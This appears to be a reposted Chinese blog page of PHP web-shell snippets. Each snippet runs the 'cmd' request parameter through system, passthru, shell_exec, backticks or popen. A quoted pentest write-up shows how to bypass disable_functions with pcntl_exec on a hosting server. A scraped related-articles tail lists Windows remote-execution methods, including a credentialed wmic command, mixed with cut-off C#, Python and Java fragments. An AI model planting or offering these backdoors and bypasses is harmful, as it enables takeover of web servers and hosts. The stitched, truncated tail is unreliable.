PHP执行cmd方法若干

<?php
/*
$action = $_GET[‘cmd‘];
echo "<pre>";
system($action);
echo"<pre/>"
*/

/*
$action = $_GET[‘cmd‘];
echo"<pre>";
echo passthru($action);
echo"<pre/>";
*/

/*
$action = $_GET[‘fuck‘];
echo"<pre>";
echo shell_exec ($action);
echo"<pre/>";
*/

/*
$action = $_GET[‘cmd‘];
echo "<pre>";
echo `$action`;
echo "<pre/>";
*/

$action = $_GET[‘cmd‘];
echo "<pre>";
echo popen($action,‘r‘);
echo "<pre/>";

?>

  

 转载:

利用pcntl_exec突破disable_functions

1、说明

pcntl是linux下的一个扩展,可以支持php的多线程操作。
pcntl_exec函数的作用是在当前进程空间执行指定程序,版本要求:PHP > 4.2.0

2、利用

在做渗透的时候被disable_functions卡住不能执行命令是家常便饭,今天在一国外虚拟主机上又被卡了,但我在执行phpinfo();的时候眼前闪过–enable-pcntl。当时我就偷笑了,没啥好说的,我一直强调渗透要细心做人做事也一样。

#exec.php
<?php pcntl_exec(“/bin/bash”, array(“/tmp/b4dboy.sh”));?>

#/tmp/b4dboy.sh

#!/bin/bash
ls -l /

  

时间: 2024-12-29 11:33:47

PHP执行cmd方法若干的相关文章

C# 执行CMD命令的方法

/// <summary> /// 执行CMD命令 /// </summary> /// <param name="str"></param> /// <returns></returns> public static string ExeCmd(string str) { try { //string str = Console.ReadLine(); System.Diagnostics.Process p =

C#执行CMD命令并接收返回结果的实现方法

using System; using System.Collections.Generic; using System.Linq; using System.Windows.Forms; using System.Diagnostics; namespace AutoApk { /// <summary> /// Cmd 的摘要说明. /// </summary> public class Cmd { private Process proc = null; /// <su

windows远程执行cmd命令的9种方法

一.远程执行命令方式及对应端口: ? IPC$+AT 445 ? PSEXEC 445 ? WMI 135 ? Winrm 5985(HTTP)&5986(HTTPS) 二.9种远程执行cmd命令的方法: 1.WMI执行命令方式,无回显: wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create "cmd.exe /c ipconfig>d:\result.txt" 2.使用Ha

.Net执行cmd命令

using System;using System.Collections;using System.Configuration;using System.Data;using System.Linq;using System.Web;using System.Web.Security;using System.Web.UI;using System.Web.UI.HtmlControls;using System.Web.UI.WebControls;using System.Web.UI.W

C#隐式执行CMD命令

本文实现C#隐式执行CMD功能命令.下图是示例程序的主界面. 在命令文本框输入DOS命令,点击"Run"button.在以下的文本框中输出执行结果. 以下是程序的完整代码. 本程序没有使用p.StandardOutput.ReadtoEnd()和p.StandardOutput.ReadLine()方法来获得输出,由于这些方法运行后画面easy卡死. 而是通过调用异步方法BeginOutputReadLine来获取输出.并在事件p.OutputDataReceived的事件处理方法中来

python中执行cmd的方式

目前我使用到的python中执行cmd的方式有三种: 1. 使用os.system("cmd") 这是最简单的一种方法,特点是执行的时候程序会打出cmd在Linux上执行的信息.使用前需要import os. [python] view plain copy print? os.system("ls") 2. 使用Popen模块产生新的process 现在大部分人都喜欢使用Popen.Popen方法不会打印出cmd在linux上执行的信息.的确,Popen非常强大,

C#执行cmd命令相关知识

1.引入 using System.Diagnostics; 2.创建执行CMD Process CmdProcess = new Process(); CmdProcess.StartInfo.FileName = "cmd.exe"; 3.配置开发方式输入输出错误 CmdProcess.StartInfo.CreateNoWindow = true; // 不创建新窗口 CmdProcess.StartInfo.UseShellExecute = false; //不启用shell

反射中的一个问题点:利用Method执行main方法特殊的地方

利用Method执行main方法 问题: 启动Java程序的main方法的参数是一个字符串数组,即public static void main(String[] args),通过反射方式来调用这个main方法时, 如何为invoke方法传递参数呢?按jdk1.5的语法,整个数组是一个参数,而按jdk1.4的语法,数组中的每个元素对应一个参数,当把一个字符 串数组作为参数传递给invoke方法时,javac会到底按照哪种语法进行处理呢?jdk1.5肯定要兼容jdk1.4的语法,会按jdk1.4的

java反射机制之Method invoke执行调用方法例子

昨天在群里跟大家讨论了下java反射调用可变参数的问题,这个问题起因是我们需要反射调用另一个部门提供的方法,我同事说java不能反射调用可变参数的方法,于是我写了个demo证明了他这个观点的错误.但是测试过程中,有一点我不明白,就是反射调用可变参数的方法时,为什么一定要保证传入的参数数组长度为1,在群里跟大家讨论了很多,没有得到确切的答案,参照网上大牛写的东西和我自己跟源码的过程,记录如下: 1.两个类,一个父类,一个子类 [java] view plain copy print? packag